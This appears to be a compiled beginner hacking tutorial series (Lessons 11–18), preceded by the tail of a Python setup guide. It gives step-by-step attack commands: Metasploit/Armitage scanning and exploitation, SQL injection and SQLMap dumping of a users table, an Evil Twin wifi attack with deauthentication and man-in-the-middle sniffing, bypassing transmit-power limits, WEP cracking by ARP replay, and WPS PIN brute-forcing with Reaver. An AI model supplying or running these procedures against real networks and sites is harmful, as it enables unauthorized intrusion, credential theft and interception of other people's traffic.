On Windows 7 or Vista: Click the Start button in the lower-left corner of the screen, move your mouse
over Computer, right-click, and select Properties from the pop-up menu. Click the Advanced System
Settings link, then click the Environment Variables...button.
On Windows XP: Right-click the My Computer icon on your desktop and selectProperties. Select
the Advanced tab, then click the Environment Variables... button.
Once you’ve brought up the environment variable editor, you’ll do the same thing regardless of which version of
Windows you’re running. Under System Variables in the bottom half of the editor, find a variable
called PATH. If there is is one, select it and click Edit.... Assuming your Python root is C:\Python34, add
these two folders to your path (and make sure you get the semicolons right; there should be a semicolon
between each folder in the list):
C:\Python34 C:\Python34\Scripts
Note: If you want to double-click and start your Python programs from a Windows folder and not have the
console window disappear, you can add the following code to the bottom of each script:
<tt><span class="kw1">print</span><span class="br0">(</span><span class="st0">"Hello
World"</span><span class="br0">)</span> <span class="co1">#stops console from exiting</span> end_prog
<span class="sy0">=</span> <span class="st0">""</span> <span class="kw1">while</span> end_prog <span
class="sy0">!=</span> <span class="st0">"q"</span>: end_prog <span class="sy0">=</span> <span
class="kw2">input</span><span class="br0">(</span><span class="st0">"type q to quit"</span><span
class="br0">)</span></tt>
INTERACTIVE MODE
Go into IDLE (also called the Python GUI). You should be presented with a window that has some text like this:
Python 3.0 (r30:67503, Dec 29 2008, 21:31:07) [GCC 4.3.2 20081105 (Red Hat 4.3.2-7)] on linux2 Type
"copyright", "credits" or "license()" for more information.
**************************************************************** Personal firewall software may warn about the
connection IDLE makes to its subprocess using this computer's internal loopback interface. This connection is
not visible on any external interface and no data is sent to or received from the Internet.
**************************************************************** IDLE 3.0 &gt;&gt;&gt;
The >>> is Python’s way of telling you that you are in interactive mode. In interactive mode what you type is
immediately run. Try typing 1+1 in. Python will respond with2. Interactive mode allows you to test out and see
what Python will do. If you ever feel you need to play with new Python statements, go into interactive mode and
try them out.
CREATING AND RUNNING PROGRAMS
Go into IDLE if you are not already. In the menu at the top, select File then New File. In the new window that
appears, type the following:
<span class="kw1">print</span><span class="br0">(</span><span class="st0">"Hello, World!"</span><span
class="br0">)</span>
Now save the program: select File from the menu, then Save. Save it as “hello.py” (you can save it in any folder
you want). Now that it is saved it can be run.
Next run the program by going to Run then Run Module (or if you have an older version of IDLE
use Edit then Run script). This will output Hello, World! on the*Python Shell* window.
PROGRAM FILE NAMES
It is very useful to stick to some rules regarding the file names of Python programs. Otherwise some
things might go wrong unexpectedly. These don’t matter as much for programs, but you can have weird
problems if you don’t follow them for module names (modules will be discussed later).
Always save the program with the extension .py. Do not put another dot anywhere else in the file name.Only
use standard characters for file names: letters, numbers, dash (-) and underscore (_).White space (” “) should
not be used at all (use underscores instead).Do not use anything other than a letter (particularly no numbers!)
at the beginning of a file name.Do not use “non-english” characters (such as ä, ö, ü, å or ß) in your file
names—or, even better, do not use them at all when programming.
USING PYTHON FROM THE COMMAND LINE
If you don’t want to use Python from the command line, you don’t have to, just use IDLE. To get into interactive
mode just type python3 without any arguments. To run a program, create it with a text editor (Emacs has a
good Python mode) and then run it with python3 program_name.
RUNNING PYTHON PROGRAMS IN UNIX
If you are using Unix (such as Linux, Mac OS X, or BSD), if you make the program executable with chmod, and
have as the first line:
<span class="co1">#!/usr/bin/env python3</span>
you can run the python program with ./hello.py like any other command.
Thanks for learning!
Lesson 11: Introduction to Armitage
Installing Metasploit
Now metasploit is not distributed with Kali Linux (it was distributed with backtrack
though). However, Kali has it on its repositories, and it can be easily downloaded and
installed by executingapt-get install armitage
It will check dependencies and download the required file and install Armitage for
you. After its done, you can start armitage by using the following codeservice postgresql start
service metasploit start
armitage
You will get a screen like this. Let the settings be as they are, and click connect.
You'll get a prompt like this (most of the time)
Now you'll see Armitage making some connection for you. For a short while it might
show failure messages (Connection Refused), but after some time Armitage will start.
And you'll end up with a windows somewhat like this
Now while I do believe that the developer has succeeded in making a tool which
permits me to say - "I'll take my leave, you can handle stuff from here", but I'd still go
on for a while, helping you know some basic stuff before I take my leave.
Armitage Basics
Now the tough coding (honestly there wasn't anything tough about that) that you had
to do with Metasploit, becomes as easy as a click on Armitage. Better yet, you can see
exactly what line of code is actually executed when you do something with your
mouse. As a start, you should do a quick scan with OS detect.
And while it does ask you to enter some stuff now, it is going to be pretty easy, you
just have to follow the example given by armitage with some modification.
First do your old ifconfig on a new terminal to find you IP
ifconfig
Notice that most of the time, the first 6 digits are 192.168. You have to figure out the
next 3 digits. After that, you can enter the ip into the armitage window. Look at the
sample it had provided, just copy that, and, replacing the 1 with 154 as in my case.
You final code should be 192.168.154.0/24. The 0/24 means it'll look at all the IPs
from 192.168.154.1 to 192.168.154.256. Actually it scans IP from 192.168.xxx.0
through 192.168.xxx.255. Most of the time, you'll find your host in this range,
however, to include all IP from 192.168.0.0 to 192.168.255.255, you may
use 192.168.0.0/16.
This is the automatically generated code after clicking OK.
Now, after a few seconds, you will see the following message, and it tells you exactly
what you're supposed to do next.
Now a couple of computers with respective OS icons will show up on your screen. As
expected, you'll have to go to Attacks -> Find attacks. There's no rocket science here,
and I'm not putting any more screenshots. After that, right click on the computer you
want to hack, and you'll see an attack option. Select whichever you want to try, enter
the requisites (you learnt how to do Information gathering in the previous Metasploit
tutorials). Everything will be quite easy, except for the fact that the exploits in attack
section will be possible exploits, that might or might not work. If you're expecting a
click to hack you a Windows 7 machine, then that's just not happening. It might work
with an unpatched XP machine, a ms03_026_dcom might do the trick, or the netapi
one. Good luck with playing around with this tool. And here's the official Armitage
website (media section link, useful vids and pics there) where you might find some
more guidance, though the tool doesn't need any.
Lesson 12: Sql Injection Basics
SQL Injection : How It Works
Introduction
Lets get started at an apparently unrelated point. Lets assume we create a table in
SQL. Now there are three main parts of a database management system, like SQL.
They are 


Creating structure of table
Entering data
Making queries (and getting meaningful results from data)
Now, when SQL is used to display data on a web page, it is common to let web users
input their own queries. For example, if you go to a shopping website to buy a
smartphone, you might want to specify what kind of smartphone you want. The site
would probably be storing data about phones in table with columns like Name, Price,
Company, Screen Size, OS, etc.
Now they allow you to create a query using some sort of user friendly drop down
based form which lets you select your budget, preferred company, etc. So basically,
you, the user, can create queries and request data from their SQL servers.
Now this automated method of creating queries for you is relatively safe, there is
another method of creating queries which can be exploited by us. A url ending in .php
is a direct indication that the website/blog uses sql to deliver a lot of it's data, and that
you can execute queries directly by changing the url. Now basically the data in the
SQL tables is protected. However, when we send some rogue commands to the SQL
server, it doesn't understand what to do, and returns an error. This is a clear indication
that with proper coding, we can send queries that will make the database 'go berserk'
and malfunction, and give us all the otherwise private data of its tables. This attack
can be used to obtain confidential data like a list of username and passwords of all
users on a website.
Steps
1. We have to find a website which is vulnerable to SQL injection (SQLi) attacks.
Vulnerability has 2 criteria. Firstly, it has to allow execution of queries from
the url, and secondly, it should show an error for some kind of query or the
other. An error is an indication of a SQL vulnerability.
2. After we know that a site is vulnerable, we need to execute a few queries to
know what all makes it act in an unexpected manner. Then we should obtain
information about SQL version and the number of tables in database and
columns in the tables.
3. Finally we have to extract the information from the tables.
Vulnerabilities are found using your own creativity along with famous dorks (more on
this in a later tutorial)
For the 2nd and 3rd step, there are 2 ways to do them
Manually using some standard codes available online (and if you know SQL then you
can figure most of the stuff out yourself). For example, you can instruct the database
to give you all the data from a table by executing the commandSELECT * FROM Users WHERE UserId = 105 or 1=1
Now, while the first part of the query "UserID=105" may not be true for all user, the
condition 1=1 will always be true. So basically the query will be prompted to return
all the data about the user for all the users for whom 1=1. Effectively, you have the
username and passwords and all other information about all the users of the website.
The first command is legit and gives you access to data of srinivas only, and only in the condition where the
password is correct. The second statement gives you access to data of all accounts.

Using some tool - Some tools help in making the process easier. You still have to use
commands but using tools is much more practical after you have an idea what is
actually happening. I don't recommend all the GUI Windows tools which are found on
malware filled websites, and never work. All throughout this blog we have used Kali
Linux, and if you really are serious about hacking, there is no reason not to have Kali
linux installed. In Kali linux, there is a great tool called SQLMap that we'll be using.
That's it for this tutorial, you now know how SQL Injections work. It might be worth
your time learning some SQL on W3schools till I come up with some other tutorial.
Lesson 13: More SQLMap
Hacking Websites Using Sqlmap in Kali linux
Sql Version
Boot into your Kali linux machine. Start a terminal, and type sqlmap -h
It lists the basic commands that are supported by SqlMap. To start with, we'll execute
a simple command
sqlmap -u <URL to inject>. In our case, it will besqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
Sometimes, using the --time-sec helps to speed up the process, especially when the
server responses are slow.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15
Either ways, when sqlmap is done, it will tell you the Mysql version and some other
useful information about the database.
The final result of the above command should be something like this.
Note: Depending on a lot of factors, sqlmap my sometimes ask you questions which
have to be answered in yes/no. Typing y means yes and n means no. Here are a few
typical questions you might come across

Some message saying that the database is probably Mysql, so should sqlmap skip all
other tests and conduct mysql tests only. Your answer should be yes (y).
Some message asking you whether or not to use the payloads for specific versions of
Mysql. The answer depends on the situation. If you are unsure, then its usually better
to say yes.
Enumeration
Database
In this step, we will obtain database name, column names and other useful data from
the database.
List of a few common enumeration commands
So first we will get the names of available databases. For this we will add --dbs to our
previous command. The final result will look like sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs
So the two databases are acuart and information schema.
Table
Now we are obviously interested in acuart database. Information schema can be
thought of as a default table which is present on all your targets, and contains
information about structure of databases, tables, etc., but not the kind of information
we are looking for. It can, however, be useful on a number of occasions. So, now we
will specify the database of interest using -D and tell sqlmap to enlist the tables using
--tables command. The final sqlmap command will besqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables
The result should be something like this Database: acuart
[8 tables]
+-----------+
| artists |
| carts |
| categ |
| featured |
| guestbook |
| pictures |
| products |
| users |
+-----------+
Now we have a list of tables. Following the same pattern, we will now get a list of
columns.
Columns
Now we will specify the database using -D, the table using -T, and then request the
columns using --columns. I hope you guys are starting to get the pattern by now. The
most appealing table here is users. It might contain the username and passwords of
registered users on the website (hackers always look for sensitive data).
The final command must be something likesqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -columns
The result would resemble this-
Data
Now, if you were following along attentively, now we will be getting data from one of
the columns. While that hypothesis is not completely wrong, its time we go one step
ahead. Now we will be getting data from multiple columns. As usual, we will specify
the database with -D, table with -T, and column with -C. We will get all data from
specified columns using --dump. We will enter multiple columns and separate them
with commas. The final command will look like this.
sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C
email,name,pass --dump
Here's the result
John Smith, of course. And the password is test. Email is [email protected]?? Okay,
nothing great, but in the real world web pentesting, you can come across more
sensitive data. Under such circumstances, the right thing to do is mail the admin of the
website and tell him to fix the vulnerability ASAP. Don't get tempted to join the dark
side. You don't look pretty behind the bars. That's it for this tutorial. Try to look at
other columns and tables and see what you can dig up.
Lesson 14: Evil Twin
Evil Twin Tutorial
You will also need to install a tool (bridge utils) which doesn't come pre-installed in
Kali. No big dealapt-get install bridge-utils
Objectives
The whole process can be broken down into the following steps1. Finding out about the access point (AP) you want to imitate, and then actually
imitating it (i.e. creating another access point with the same SSID and
everything). We'll use airmon-ngfor finding necessary info about the network,
and airbase-ng to create it's twin.
2. Forcing the client to disconnect from the real AP and connecting to yours.
We'll useaireplay-ng to deauthenticate the client, and strong signal strength to
make it connect to our network.
3. Making sure the client doesn't notice that he connected to a fake AP. That
basically means that we have to provide internet access to our client after he
has connected to the fake wireless network. For that we will need to have
internet access ourselves, which can be routed to out client.
4. Have fun - monitor traffic from the client, maybe hack into his computer using
metasploit.
PS: The first 3 are primary objectives, the last one is optional and not a part of evil
twin attack as such. It is rather a man in the middle attack. Picture credits
: firewalls.com
Information Gathering - airmon-ng
To see available wireless interfacesiwconfig
To start monitor mode on the available wireless interface (say wlan0)airmon-ng start wlan0
To capture packets from the air on monitor mode interface (mon0)
airodump-ng mon0
After about 30-40 seconds, press ctrl+c and leave the terminal as is. Open a new
terminal.
Creating the twin
Now we will use airbase-ng to create the twin network of one of the networks that
showed up in the airodump-ng list. Remember, you need to have a client connected to
the network (this client will be forced to disconnect from that network and connect to
ours), so choose the network accordingly. Now after you have selected the network,
take a note of it's ESSID and BSSID. Replace them in given code-
airbase-ng -a <BSSID here> --essid <ESSID here> -c <channel here> <interface
name>
If you face any problems, a shorter code will be-
airbase-ng --essid <name of network> mon0
Remove the angular brackets (< & >) and
choose any channel that you want. Also, the BSSID can be randomly selected too, and
doesn't have to match with the target. The interface would be mon0 (or whatever is
the card you want to use) . The only thing identical about the twins has to be their
ESSIDs (which is the name of the network). However, it is better to keep all
parameters same to make it look more real. After you are done entering the
parameters and running the command, you'll see that airbase turned your wireless
adapter into an access point.
Note : We will need to provide internet access to our client at a later stage. Make sure
you have a method of connecting to the net other than wireless internet, because your
card will be busy acting like an AP, and won't be able to provide you with internet
connectivity. So, either you need another card, or broadband/ADSL/3G/4G/2G
internet.
Man in the middle attack : Pic Credits: owasp.net
Telling the client to get lost
Now we have to ask the client to disconnect from that AP. Our twin won't work if the
client is connected to the other network. We need to force it to disconnect from the
real network and connect to the twin.
For this, the first part is to force it to disconnect. Aireplay will do that for usaireplay-ng --deauth 0 -a <BSSID> mon0 --ignore-negative-one
The 0 species the time internal at which to send the deauth request. 0 means extremely
fast, 1 would mean send a packet every 1 seconds, 2 would mean a packet every 2
seconds, and so on. If you keep it as 0, then your client would be disconnected in a
matter of seconds, so fire up the command, and press ctrl+c after a few seconds only.
Note that the deauth is sent on broadcast, so all the clients (not just one) connected to
the network will disconnect. Disconnecting a specific client is also possible.
Not the real one, but why the fake one
Even after being disconnected from the real AP, the client may choose to keep trying
to connect to the same AP a few more times, instead of trying to connect to ours. We
need to make our AP stand out, and for that, we need more signal strength. There are
2 ways to do that1. Physically move closer to the client.
2. Power up your wireless card to transmit at more power.
The latter can be done with the following command iwconfig wlan0 txpower 27
Here 27 is the transmission power in dBm. Some cards can't transmit at high power,
and some can transmit at extremely high power. Alfa cards usually support upto
30dBm, but many countries don't allow the card to transmit at such powers. Try
changing 27 to 30 and you'll see what I mean. In Bolivia, however, you can transmit
at 30dBm, and by changing the regulatory domain, we can overcome the power
limitation.
iw reg set BO
iwconfig wlan0 txpower 30
It is strongly advised to not break laws as the transmission limits are there for a
reason, and very high power can be harmful to health (I have no experimental
evidence). Nevertheless, the client should connect to you if your signal strength is
stronger than that you the real twin.
Note : If you are unable to get your client to connect to you, there is another
option. You can leave him with no options. If you keep transmitting the deauth
packets continuously (i.e. don't press ctrl+c after the client has disconnected), he
will have no choice but to connect to you. However, this is quite an unstable
situation, and the client will go back to the real twin as soon as it gets the chance.
Give the fake AP internet access
Now we need to provide internet access to the fake AP. This can be done in various
ways. In this tutorial, we will consider that we have an interface x0 which has internet
connectivity. Now, if you are connected to net via wireless, replace x0 with wlan1 or
wlan0, a 3G modem will show up as ppp0. Nevertheless, you just have to know which
interface is providing you with internet, and you can route the internet access to your
client.



Interfaces
x0 - This has internet access
at0 - This is create by airbase-ng (wired face of the wireless access point). If you can
somehow give internet access to at0, then the clients connected to your fake wireless
network can connect to the net.
evil - This is an interface that we will create, whose job will be to actually bridge the
networks.
Creating evil
We will use Bridge control utility provided by Kali, brctl. Execute the following
codebrctl addbr evil
This will create the bridge. Now we have to specify which two interfaces have to be
bridgedbrctl addif evil x0
brctl addif evil at0
We can assign an IP to the interfaces and bring them up usingifconfig x0 0.0.0.0 up
ifconfig at0 0.0.0.0 up
Also bring up the evil interface (the interfaces aren't always up by default so we have
to do this many times)
ifconfig evil up
Now to auto configure all the complicated DHCP settings, we'll use dhclient
dhclient3 evil &
Finally, all the configurations have been completed. You can execute ifconfig and see
the results, which will show you all the interfaces you have created.
Officially, the evil twin attack is complete. The client is now connected to your fake
network, and can use the internet pretty easily. He will not have any way to find out
what went wrong. However, the last objective remains.
Have fun
Now that the client is using the internet via our evil interface, we can do some evil
stuff. This actually comes under a Man In The Middle attack (MITM), and I'll write a
detailed tutorial for it later. However, for the time being, I will give you some idea
what you can do.
Sniffing using Wireshark
Now all the packets that go from the user to the internet pass through out evil
interface, and these packets can be monitored via wireshark. I won't teach you how to
use it here, since it is a GUI tool. You can take a look at their website to get an idea on
how to use wireshark. Pic credits: The picture on the right has been directly taken
from their website.
http://www.wireshark.org/docs/wsug_html_chunked/ChapterIntroduction.html
Lesson 15: Ad-Hoc Networks (Pentesting yourself the
legal way)
Create A Wireless Ad-Hoc Network on
Windows 8 Using command line
For the hackers
This method works with all versions of Windows. This
article is relevant and important here since the best way
to start with hacking is to practice on yourself. You are
going to need two adapters for this task. One on Windows
which will create the network, and another on Kali Linux
which will hack the network. This article concentrates
only on the former part of the exercise, and we'll only
create an ad-hoc network here. So non-hackers too can
follow from here on.
For everyone
1. Get access to an elevated command prompt (with
administrator privileges). [On Windows 8 : Press
Windows key + X or hover your mouse to the lowermost
corner on the left part of the screen and right
click. Then click "Command Prompt Admin"
2. Now type
netsh wlan show drivers
3. If the hosted network supported says yes, move on to
the next step
4. Now type - netsh wlan set hostednetwork mode=allow
ssid=<enter_network_name_here>
key=<enter_password_here>
5. Finally type netsh wlan start hostednetwork. Your
ad-hoc network is ready.
Lesson 16: Creating a dummy Wi-Fi network for
pentesting
Creating A dummy wifi for hacking
What you'll need
At least 2 wireless adapters. I've got three. First one is the internal adapter which came
with my laptop. The other 2 are DLink adapters.
This is what it looks like.
My Dlink Adapter
This is what it looks like on my Windows machine ( I blurred the names a bit. Its a sort of convention I guess)
What now
Now since we have multiple adapters, we can use one of them to create a wireless
network on Windows and then practice hacking it on a virtual Kali Linux machine.
This is our newly created network. Now we can turn on our Kali machine and see if it
is discovered there.
So it showed up pretty fine. We can use netsh to modify the security parameters as
necessary (WEP, WPA, etc. and practice our hacking skills on our dummy wifi
network)
Lesson 17: Speeding up WEP Hacking in Kali Linux
Speeding Up WEP Hacking In Kali
Now if you have followed the basic WEP hacking tutorial, then you are ready to
proceed to the stage where you follow an intermediate level hacking tutorial. In this
tutorial, we will look at the intricate details of what is happening and approach the
complicated methods and concepts.
To start with, I'll address a common question
14 March 2014 19:28
i couldn't find any wlan when i write ifconfig in terminal
1.
1. Are you using Kali Linux on a virtual machine. Please note that a wireless adapter can
only be used by only one machine at a time. Your host machine has access to the
wireless adapter, not the virtual machine. This question has been discussed at length
on superuser forums. The conclusion is that you can't directly connect internal wifi card
using
any
Virtual
machine
software-
"Unfortunately no virtualization software allows for direct access to hardware devices
like
that.
Compare VirtualBox with VMware Fusion and Parallels for Mac. All 3 of those
programs behave the same way. The only devices that can be directly accessed are
usb devices. Everything else is abstracted though the virtualization engine. (Though
you could argue that the vm has lower level access to cd rom's and storage devices).
I wish I could give you a better answer, than simply to buy a usb wireless card."
Basically you have to buy an external wireless card. They aren't very expensive. I
personally use two of them myself. If you want to see what I use, take a look
here,
http://beginnnerhacking.blogspot.in/2014/02/creating-dummy-wifi-for-
hacking.html
So basically you have 2 choices. First, you can buy a new external wireless adapter
(no referral links here). Secondly, you can side install Kali with Windows or run it via
a USB. A virtual machine can only use computer hardware if it is externally
connected via USB. Now there is another catch here. The internal adapters, almost all
of them, don't support injection. This is extremely important for speeding up wireless
hacking. So if you really want to go in depth of wireless hacking, then its time to buy
an external adapter or two (the more the better). If that's not a possibility, you might
want to spend hours trying to get a driver which might make your internal adapter
support injection (I don't know anyone who succeeded in this, but it might be
possible).
Kali Linux
I don't know why it needs mention here, but still, if you don't have Kali Linux (or
Backtrack) installed yet, you will have to install it before you can start this tutorial.
Check Injection Support
Aircrack-ng has a comprehensive article related to checking injection support. You
might check their website out for it. I am just providing the commands which will be
enough to find out whether injectipn is working or not.
airmon-ng start wlan0 [or wlan1]
(Puts your wireless adapter in monitor mode. From now we'll refer to wlan0/wlan1 as
mon0
airserv-ng -d mon0
aireplay-ng -9 127.0.0.1:666
This basically sets up a temporary server sort of thing that is waiting for you to test
your injection capabilities. The second command actually tries to inject the server, and
succeeds. 127.0.0.1 is the IP which is reserved for loopback. It is always used when
you are carrying out some command on yourself. 666 is the port we are using. Most of
the time, what follows an IP and a colon is the port. The general form is somewhat
like IP:port. So finally you have checked your injection capabilities, and the last line
- "Injection is working!" should bring a smile to your face. If not, you'll have to buy a
card which supports injection, or see some forum posts which will help you figure
something out.
Check Signal Strength
While the basic hacking methods from the previous post don't have any real strength
restriction, you need to be physically close to the access point in order to inject
packets. There is information regarding the same in the same aircrack-ng tutorial.
Again, I'm gonna summarize what you have to do here.
First, we will use airodump-ng mon0 to see the list of networks in range. See the one
you want to hack.
Airodump-ng lists the networks in range.
Now we will hack the digisol network. Make a note of the BSSID of the network you
want to hack. A good practice is to store all the information gathered in any text
editor. We should, at this stage, take a note of following:




ESSID - DIGISOL
BSSID - 00:17:7C:22:CB:80
CH (channel) - 2
Mac address of genuine users connected to the network:
Interface : wlan1 - referred to as mon0
You should gather the equivalent information for the network you will be working on.
Then just change the values whenever I use them in any of the commands
Note : We need at least one user (wired or wireless) connected to the network
and using it actively. The reason is that this tutorial depends on receiving at least
one ARP request packet and if there are no active clients then there will never be
any ARP request packets.
Now, to check whether the signal strength will be sufficient, we will simply execute
the following codeairodump-ng [interface] -c [channel]
airodump-ng mon0 -c 2
This will make the wireless card only read packets in the channel no. 2, on which our
target network is.
Now to test the network, type the following codeaireplay-ng --test -e DIGISOL -a 00:17:7C:22:CB:80 mon0
The last time we checked whether the wireless card had the capability to inject
packets. We tested it on our own computer. This time, we actually injected packets
into the target computer. If this worked, then it's pretty good news, and it means that
you are most probably going to be able to hack this network. The last line 30/30 :
100% determines how good the strength of the signal is. A very high percentage is a
good sign, and 100 is ideal.
Capture Packets
Now we have already run airodump-ng a couple of times. However, this time we will
pass the -w command which will instruct airodump-ng to save the output to a file.
airodump-ng -c [channel] --bssid [bssid]-w [file_name] [interface]
airodump-ng -c 2 --bssid 00:17:7C:22:CB:80 -w dump mon0
Now the output will be saved in a file dump-01.cap
Now we can keep this terminal running and it will keep saving the packets. [In the
previous tutorial we did only 2 things, capture the packet, i.e this step, and crack it,
i.e. the step we are going to do last. While it makes our work easier to just follow two
steps, it also makes the process much more time consuming, since we are simply a
passive packet listener, who is not doing anything]
Speeding Things Up
Fake Authentication
Now to speed things up, we will inject the network. We will thus obtain ARP packets.
These packets will fill up the data column of our airodump-ng capture, and data is
what will help us obtain the password. As soon as we have 10000 data packets, we
can start attempting to get the password using aircrack-ng.
Now to make the AP pay attention to your injected packets, you either have to be a
connected client, or have to pretend to be one. You can either mask your mac address
to one of the already connected clients, or use the fake authentication feature. We will
do the latter. (If you see an error like the AP is on channel x and mon0 is on channel y
then go to the bottom of the post for troubleshooting)
aireplay-ng -1 0 -e DIGISOL -a 00:17:7C:22:CB:80 mon0
Authenticated and capturing packets
ARP request replay mode
ARP packets are your best bet at getting a lot of IVs or data. Without IVs you can't
hack a network. Enter the following code to make aireplay-ng listen to the AP for
ARP packets, and inject them as soon as they find one. This will create a lot of data
very fast. This is the real speeding step.
aireplay-ng -3 -b [BSSID] mon0
This is what the final code will look likeaireplay-ng -3 -b 00:17:7C:22:CB:80 mon0
This is what it'll look like in the beginning
Now you'll have to wait for some time till it gets an ARP request. As soon as it gets
one, the terminal will sort of explode. And the data packets will start filling in with
Godspeed. Now this is the part where an active user on the network is absolutely
necessary.
Slow start
Everything got fine after some time
After some time I had enough packets to crack almost any network
The data filled in VERY fast
The video shows how fast the IVs flowed in after ARP injection started.
Cracking the network
Cracking the network is as easy as typing the following into the console
aircrack-ng name_of_file-01.cap
In our case, the command will be
aircrack-ng dump-01.cap
After pressing enter, you will have a list of networks and you'll be prompted to select
which one of them to hack. In my case there was just one network, so I couldn't get
that screen, or a screenshot. The password was cracked in less than a second.
I have blurred out the password and some random stuff.
So finally you have obtained the password of the network you were trying to hack.
Troubleshooting
A person commented on another wireless hacking post. This is the problem he faced.
whenever i try to use aireplay-ng, with the options, always fail saying that mon0 is in channel -1 and the target is in
other channel. How can i fixed this? i looked a lot for a real answer but nobody know what is this.
This is a possible solution
Okay, try the following1) When you start the monitor mode, specify the channel usage: airmon-ng [channel or frequency]
Your code : airmon-ng start wlan0 6
Substitute 6 with the required channel.
2) While starting airodump, specify the channel
airodump-ng mon0 -c 6
I was facing this problem when my mon0 kept hopping from one channel to the other, and the second step alone
solved my problem. If your airmon-ng assigns itself a fixed channel on its own will, without you even specifying it,
then the problem might be more complicated. If the above steps don't solve the problem, take a look here
- http://ubuntuforums.org/showthread.php?t=1598930
Lesson 18: Hack WEP with WPS enabled
Hack WPA/WPA2 WPS - Reaver - Kali Linux
WPA/WPA-2
When it was known that a WEP network could be hacked by any kid with a laptop
and a network connection (using easy peasy tutorials like those on our blog), the
security guys did succeed in making a much more robust security measure
WPA/WPA2.
Now hacking WPA/WPA2 is a very tedious job in most
cases. A dictionary attack may take days, and still might not succeed. Also, good
dictionaries are huge. An exhaustive bruteforce including all the alphabets (uppercase
lowercase) and numbers, may take years, depending on password length. Rainbow
tables are known to speed things up, by completing a part of the guessing job
beforehand, but the output rainbow table that needs to be downloaded from the net is
disastrously large (can be 100s of GBs sometimes). And finally the security folks
were at peace. But it was not over yet, as the new WPA technology was not at all easy
for the users to configure. With this in mind, a new security measure was introduced
to compliment WPA. Wifi Protected Setup (WPS). Now basically it was meant to
make WPA even tougher to crack, and much easier to configure (push a button on
router and device connects). However, it had a hole, which is now well known, and
tools like reaver can exploit it in a single line statement. It still might take hours, but it
is much better than the previous scenario in which months of brute-forcing would
yield no result.
Here's what wikipedia says about WPSCreated by the Wi-Fi Alliance and introduced in 2006, the goal of the protocol is to
allow home users who know little of wireless security and may be intimidated by the
available security options to set up Wi-Fi Protected Access, as well as making it easy
to add new devices to an existing network without entering long passphrases. Prior to
the standard, several competing solutions were developed by different vendors to
address the same need. A major security flaw was revealed in December 2011 that
affects wireless routers with the WPS feature, which most recent models have enabled
by default. The flaw allows a remote attacker to recover the WPS PIN in a few hours
with a brute-force attack and, with the WPS PIN, the network's WPA/WPA2 preshared key. Users have been urged to turn off the WPS feature, although this may not
be possible on some router models.
Working Of WPS


Now while most of the things are the same as in WPA, there is a new concept of using
pins for authentication. So basically, the client sends 8 digit pins to the access point,
which verifies it and then allows the client to connect. Now a pin has 8 digits, and
only contains numbers, so its a possible target for bruteforece. Under normal
bruteforcing of WPA passwords, you have to consider the fact that there may be
number, alphabets, and sometimes symbols (and more than 8 letters). This make the
task a billion billion times tougher. However, we can try thousands of keys per
second, which make it a tad bit easier. Now in WPS, there is a delay because we have
to wait for APs response, and we may only try a few keys per second (practically the
best I've seen on my PC is 1 key per 2 sec). Basically, 8 digits and 10 possibilities per
digit (0-9) make it 10^8 (interpret ^ as raised to the power of)seconds if we assume
one key per second. Now that'll be years. So, where is this taking us? The answer is,
there are flaws in this technology that can be used against it.
The 8th digit is a checksum of first 7 digits. 10^7 possibilities, i.e. one-tenth time.
Two months, still a way to go.
The pin number for verification goes in two halves, so we can independently verify
the first four and the last four digits. And believe me, its easy to guess 4 digits correct
two times, than to guess 8 correct digits at once. Basically, the first half would take
10^4 guess and the second would take 10^3.
Now the guesses would be 10^4 + 10^3 (not 10^4 *10 ^3). Now we need 11,000
guesses.
So that'll take 3 hours approximately. And that's all the combinations, and most
probably the correct pin will not be the last combination, so you can expect to reach
the result earlier. However, the assumption is that bruteforcing will take place at a key
per second. My personal best is a key every 2 seconds, and yours might drop to as low
as a key every 10 seconds.
How to carry out the attack
Now it might have been tough to carry out this attack at some point in history, but
now, its a breeze. If you have all the prerequisites, then hacking the network would be
as easy as
reaver -i <interface-name> -b <BSSID of target>
And if you are already familiar with hacking WEP, then just go to your Kali Linux
terminal and type the above command (replacing what needs to be replaced). Leave
your machine as is, come back 10 mins later, check the progress (must be 1%
or something), and go take a nap. However, if you're a newbie, then tag along.
Kali Linux
First off, you need to have Kali linux (or backtrack) up and running on your machine.
Any other Linux distro might work, but you'll need to install Reaver on your
own. (Reaver has a known issue : Sometimes it doesn't work with Virtual Machines,
and you might have to do a live boot using live CD or live USB of Kali Linux. See the
last section of this post on = troubleshooting by scrolling down a bit)
Information Gathering



Now you need to find out the following about you target networkDoes it have WPS enabled. If not, then the attack will not work.
The BSSID of the network.
Now to check whether the network has WPS enabled or not, you can either
use wash or just use the good old airodump-ng. Wash is specifically meant to check
whether a network has WPS enabled or not, and thereby is much easier to use. Here
are the stepsSet your wireless interface in monitor modeairmon-ng start wlan0

Use wash (easy but sometimes unable to detect networks even when they have wps
enabled). If any network shows up there, it has WPS enabled.
wash -i mon0
This will show all the networks with WPS enabled
This is an error which I haven't figured out yet. If you see it, then you'll have to do some howework, or move
on to airodump method. Update : wash -i mon0 --ignore-fcs might solves the issue.

Use airodump-ng. It will show all networks around you. It tells which of them use
WPA. You'll have to assume they have WPS, and then move to next steps.
airodump-ng mon0
None of them has WPS enabled, just saying.
BSSID of the network - Now irrespective of what you used, you should have a
BSSID column in the result that you get. Copy the BSSID of the network you want to
hack. That's all the information you need.
So by now you must have something like XX:XX:XX:XX:XX:XX, which is the
BSSID of your target network. Keep this copied, as you'll need it.
Reaver
Now finally we are going to use Reaver to get the password of the WPA/WPA2
network. Reaver makes hacking very easy, and all you need to do is enterreaver -i mon0 -b XX:XX:XX:XX:XX:XX
Explanation = i - interface used. Remember creating a monitor interface mon0 using
airmon-ng start wlan0. This is what we are using. -b species the BSSID of the network
that we found out earlier.
This is all the information that Reaver need to get started. However, Reaver comes
with many advanced options, and some are recommended by me. Most importantly,
you should use the -vv option, which increases the verbosity of the tool. Basically, it
writes everything thats going on to the terminal. This helps you see whats happening,
track the progress, and if needed, do some troubleshooting. So final command should
bereaver -i mon0 -b XX:XX:XX:XX:XX:XX -vv
After some hours, you will see something like this. The pin in this case was
intentionally 12345670, so it was hacked in 3 seconds.
Here is an extra section, which might prove useful (or more like consoling, to let you
know you are not the only one who is having troubles)
Known problems that are faced - Troubleshooting
